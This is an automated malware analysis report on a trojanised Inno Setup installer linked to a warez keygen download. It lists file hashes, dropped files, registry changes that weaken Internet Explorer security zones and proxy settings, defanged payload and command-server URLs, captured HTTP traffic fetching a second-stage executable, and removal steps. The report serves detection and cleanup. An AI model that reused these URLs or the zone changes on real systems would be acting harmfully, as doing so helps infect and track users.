Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: dc5a034db8ab7049dc5f37a17ebcb9d9
SHA1: 8dd14e0e247b6f9cc39daf7a631941867bd114a2
SHA256: 0fab15afe571c86fc4660874b02bcd4dfe3c71dd99831c7974a0e87ed27b7adc
SSDeep: 24576:kiTAj2NdhIAtyY5pXKBOTH/XXvfmUDDhjqUPhZHZxWPY4h/2:kiMG9tyoxA8HfnmUPhjRbZxT4h
Size: 1010192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: adsafiliados
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Installer. An installation package.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Installer creates the following process(es):
%original file name%.exe:824
The Installer injects its code into the following process(es):
%original file name%.exe:1124
Mutexes
The following mutexes were created/opened:
__DDrawCheckExclMode__
__DDrawExclMode__
DDrawDriverObjectListMutex
DDrawWindowListMutex
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
File activity
The process %original file name%.exe:1124 makes changes in the file system.
The Installer creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\logo4[1].png (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Pause_Button.png (577 bytes)
The Installer deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (0 bytes)
Registry activity
The process %original file name%.exe:824 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 6F 92 D1 4D 3B D1 48 F9 7F 20 30 3A FD 54 C9"
The process %original file name%.exe:1124 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E E7 74 19 0A CA AD EA FD 6F 52 68 D1 FE 3D 99"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Installer modifies IE security zone settings to map all local web nodes with no dots in their names, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Installer modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Installer modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Installer deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
399f8cefebd04b4bcc8c5db0b033aa69 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:824
- Delete the original Installer file.
- Delete or disinfect the following files created/modified by the Installer:
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\logo4[1].png (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Pause_Button.png (577 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: adsafiliados
Product Name: Installer Setup
Product Version: 1.0.5.a0.1_54944
Legal Copyright: adsafiliados
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.5.a0.1_54944
File Description: Installer Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40240 | 40448 | 4.64999 | dbda5ee849ef82a713855f811e7bfc14 |
DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 11264 | 11264 | 3.10173 | 85e26c316dd351fa3b841914fb7ded69 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 23
Network Activity
URLs
URL | IP |
---|---|
hxxp://os.fodidodasal.com/adsafiliados/?v=6.0&c=1856168701&t=1319218 | 54.194.194.239 |
hxxp://ad5.adswarez.com/downloadimage/20467/16/b021a2773080bd3c2b70eee38c21b2a9/logo4.png?logotipo=automatico&uo=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&nada=true | 104.28.16.74 |
hxxp://46.137.105.35/?v=2.0&subver=6.21&pcrc=913192198 | |
hxxp://ad5.adswarez.com/comp/20467/16/QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M.exe?plataforma=c1&&uo=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&ud=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html | 104.28.16.74 |
hxxp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen | |
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=913192198 | |
hxxp://os.Fodidodasal.com/adsafiliados/?v=6.0&c=1856168701&t=1319218 | |
img.fodidodasal.com | 199.201.110.78 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /downloadimage/20467/16/b021a2773080bd3c2b70eee38c21b2a9/logo4.png?logotipo=automatico&uo=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&nada=true HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ad5.adswarez.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2016 01:12:23 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da1ba1e8871c52d5968eb36e219d271491461460342; expires=Mon, 24-Apr-17 01:12:22 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
CF-Cache-Status: MISS
Expires: Sun, 24 Apr 2016 05:12:23 GMT
Cache-Control: public, max-age=14400
Server: cloudflare-nginx
CF-RAY: 2985afc602132b21-WAW
<<< skipped >>>
HEAD /comp/20467/16/QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M.exe?plataforma=c1&&uo=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&ud=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html HTTP/1.1
Accept: */*
Host: ad5.adswarez.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Sun, 24 Apr 2016 01:12:28 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=d33cf14d07fcd194a68138e7ca27ce2d11461460346; expires=Mon, 24-Apr-17 01:12:26 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
Location: hXXp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen
Server: cloudflare-nginx
CF-RAY: 2985afdd33522b21-WAW
<<< skipped >>>
HEAD /?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen HTTP/1.1
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2016 01:12:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
GET /?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen HTTP/1.1
Range: bytes=0-60657
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2016 01:12:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
<<< skipped >>>
POST /?v=2.0&subver=6.21&pcrc=913192198 HTTP/1.1
Accept: */*
Host: rp.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 2400
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 24 Apr 2016 01:12:24 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /adsafiliados/?v=6.0&c=1856168701&t=1319218 HTTP/1.1
Accept: */*
Host: os.Fodidodasal.com
User-Agent: ICAS
Content-Length: 1264
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 24 Apr 2016 01:12:22 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global13712aICBA
X-ICSCT-IP: 37.57.16.189
X-ICSCT-SERVER-NAME: ads.slave-131-prod-eu-west-1c-7102a8f9
X-ICSCT-TIMESTAMP: 20160423201222288
X-ICSCT-VERSION: 1.3.1
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
<<< skipped >>>
Map
The Installer connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1124:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.3)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
1.0.5.a0.1_54944
%original file name%.exe_1124_rwx_00900000_000F7000:
.idata
.edata
P.reloc
P.rsrc
kernel32.dll